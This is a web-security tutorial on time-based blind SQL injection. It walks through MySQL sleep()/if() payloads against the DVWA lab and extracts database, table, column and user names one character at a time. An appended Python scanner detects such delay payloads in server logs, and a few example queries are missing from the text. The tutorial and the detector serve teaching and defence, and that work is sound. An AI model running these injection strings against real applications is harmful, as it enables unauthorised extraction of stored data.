Time Based SQL Injection Explained | SQL Injection Series | Web Security

Introduction

As we know, if a web application does not return any visible error when the SQL query fails, we use Boolean-based SQL injection. In Boolean-based SQL injection we simply ask the database questions in the form of "true or false" statements and, according to the response of the web application, we can enumerate the database. But let's assume that in the web application there is no distinction between the results of true and false statements, and that absolutely no errors are returned from the database. In this situation Boolean-based injection does not work, so we have to perform time-based SQL injection.

Time-based SQL injection relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding; the response time then tells the attacker whether the result of the query is TRUE or FALSE. If the page is not vulnerable, it will load quickly; if it is vulnerable, it will take longer than usual to load. This enables the attacker to extract data even though there are no visible changes on the page.

For example: if the database name is "dvwa" then the response is delayed for 10 seconds, otherwise there is no delay; if the table name is "users" then the response is delayed for 5 seconds, otherwise not. So in time-based injection a true statement produces a delay, while a false statement produces no delay or only a very small one. Depending on the database, there are built-in functions available that delay the response: in MySQL the sleep() function, in MSSQL Server WAITFOR DELAY, and in PostgreSQL the pg_sleep() function.

Basic SQL Commands

Now let's look at the basic concepts of how time-based SQL injection works. I will be testing the commands below on the MySQL console. In a MySQL database, time-based SQL injection is performed by calling sleep() inside an if() condition. First let's look at the sleep() function.

sleep() function : The sleep function pauses the response of the database for the given number of seconds. For example :

In the example above the response would be delayed for 5 seconds.

if() condition : The structure of the if() condition in MySQL is :

if(condition, value_if_true, value_if_false)

This means that if the condition is true, the value_if_true expression is evaluated; otherwise value_if_false is evaluated. For example :

The example above will return 40 because the condition (20 > 40) is false. Now let's run the statement below :

select if((select database()) = "dvwa", sleep(5), null);

With the statement above, if the database name is dvwa the response is delayed for 5 seconds; otherwise it returns immediately.

We can also combine the statement above with substr() to enumerate data from the database one character at a time, for example :

select if(substr((select database()), 1, 1) = "d", sleep(5), null);
select if(substr((select database()), 2, 1) = "v", sleep(5), null);
select if(substr((select database()), 3, 1) = "w", sleep(5), null);
select if(substr((select database()), 4, 1) = "a", sleep(5), null);
select if((select database()) like "s%", sleep(2), null);
select if((select database()) like "%e$", sleep(3), null);
select if((select version()) like "5%", sleep(5), null);

Now let's try the queries above against the web application.

Exploiting Time-Based SQL Injection

For the demonstration we are going to use the DVWA vulnerable web app. To learn more about DVWA or to install it on your system, please visit Setting up Web Pentesting Lab. At DVWA we are going to use the SQL Injection (Blind) example, with the security level set to low.

In this example, when we enter a user ID, the application shows the details of that user.

Now let's enter the statement below in the user ID box.

1' and (select if((database())="dvwa", sleep(5), null)) #

Now, as we can see, the web application waits for the response from the database server, which means that our query is true. Here we can also enumerate the name of the database character by character, as we did in Boolean-based injection. For example :

1' and (select if(substr(database(), 1, 1)="d", sleep(5), null)) #

And also with the ascii() function :

1' and (select if(ascii(substr(database(), 1, 1))="100", sleep(5), null)) #

Some more queries :

1' and (select if((database()) like "d%", sleep(2), null)) #
1' and (select if((version()) like "5%", sleep(5), null)) #

Queries for extracting a table name :

1' and (select if((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0, 1)="g", sleep(5), null)) #
1' and (select if((select substr(table_name, 2, 1) from information_schema.tables where table_schema=database() limit 0, 1)="u", sleep(5), null)) #

The first table name is guestbook. Also with the ascii() function :

1' and (select if(ascii((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0, 1))="103", sleep(5), null)) #

Queries for extracting a column name :

1' and (select if((select substr(column_name, 1, 1) from information_schema.columns where table_name="guestbook" limit 0, 1)="c", sleep(5), null)) #
1' and (select if((select substr(column_name, 2, 1) from information_schema.columns where table_name="guestbook" limit 0, 1)="o", sleep(5), null)) #
1' and (select if(ascii((select substr(column_name, 1, 1) from information_schema.columns where table_name="guestbook" limit 0, 1))="99", sleep(5), null)) #

Queries for extracting user data (the first user name is admin) :

1' and (select if((select substr(user, 1, 1) from users limit 0, 1)="a", sleep(5), null)) #
1' and (select if((select substr(user, 2, 1) from users limit 0, 1)="d", sleep(5), null)) #
1' and (select if(ascii((select substr(user, 1, 1) from users limit 0, 1))="97", sleep(5), null)) #
1' and (select if(ascii((select substr(user, 2, 1) from users limit 0, 1))="100", sleep(5), null)) #

Also note that this attack is typically slow (especially on large databases), since the attacker has to enumerate the database character by character, waiting out the delay on every true guess.
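The character-by-character enumeration above leaves a recognisable trace on the server side, which is what a defender should look for. As an added example that is not part of the original post, the Python below scans constructed Apache access-log lines (combined format with the response time in microseconds appended, as Apache's %D gives it) for the two signals of time-based injection: a delay primitive from the post (sleep(), WAITFOR DELAY, pg_sleep()) in the URL-decoded parameter, and a response that took several seconds. The sample lines, IP addresses and the 3-second threshold are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines with the response time in microseconds
# appended (Apache's %D). Rows 2-3 are URL-encoded forms of the post's DVWA
# character-guess queries: the "d" guess was right (5 s delay), "e" was wrong.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0" 18342
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+%28select+if%28substr%28database%28%29%2C+1%2C+1%29%3D%22d%22%2C+sleep%285%29%2C+null%29%29+%23&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0" 5021873
10.0.0.5 - - [12/Mar/2024:10:01:15 +0000] "GET /vulnerabilities/sqli_blind/?id=1%27+and+%28select+if%28substr%28database%28%29%2C+1%2C+1%29%3D%22e%22%2C+sleep%285%29%2C+null%29%29+%23&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0" 17990
10.0.0.9 - - [12/Mar/2024:10:02:00 +0000] "GET /vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4498 "-" "curl/8.0" 2412
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+) \S+" '
    r'\d{3} \S+ "[^"]*" "[^"]*" (?P<usec>\d+)$'
)
# Delay primitives named in the post: MySQL sleep(), MSSQL WAITFOR DELAY,
# PostgreSQL pg_sleep(); matched against the URL-decoded request.
DELAY_RE = re.compile(r"\b(sleep|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)

def analyze(line, slow_ms=3000):
    # Returns (ip, timestamp, response_ms, reasons) when the line looks like
    # time-based SQLi, None when it is benign or does not parse.
    m = LOG_RE.match(line)
    if m is None:
        return None
    reasons = []
    if DELAY_RE.search(unquote_plus(m["url"])):
        reasons.append("delay-function")  # payload present, even if the guess was wrong
    if int(m["usec"]) >= slow_ms * 1000:
        reasons.append("slow-response")   # the delay fired: the guess was true
    if not reasons:
        return None
    return (m["ip"], m["ts"], int(m["usec"]) // 1000, reasons)

def scan(log_text, slow_ms=3000):
    # Every suspicious line in a log, in order.
    return [f for f in (analyze(l, slow_ms) for l in log_text.splitlines()) if f]

def suspects(findings, min_hits=2):
    # Source IPs that sent delay payloads repeatedly: the character-by-character
    # enumeration in the post produces many such requests, so count per source.
    hits = {}
    for ip, _ts, _ms, reasons in findings:
        hits[ip] = hits.get(ip, 0) + ("delay-function" in reasons)
    return {ip for ip, n in hits.items() if n >= min_hits}
```

A request carrying a delay primitive is suspicious on its own (wrong guesses return fast), while a slow response with no payload still deserves a look; only the combination confirms that a guess was true.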

Conclusion

In this post we looked at some basic concepts of time-based SQL injection.
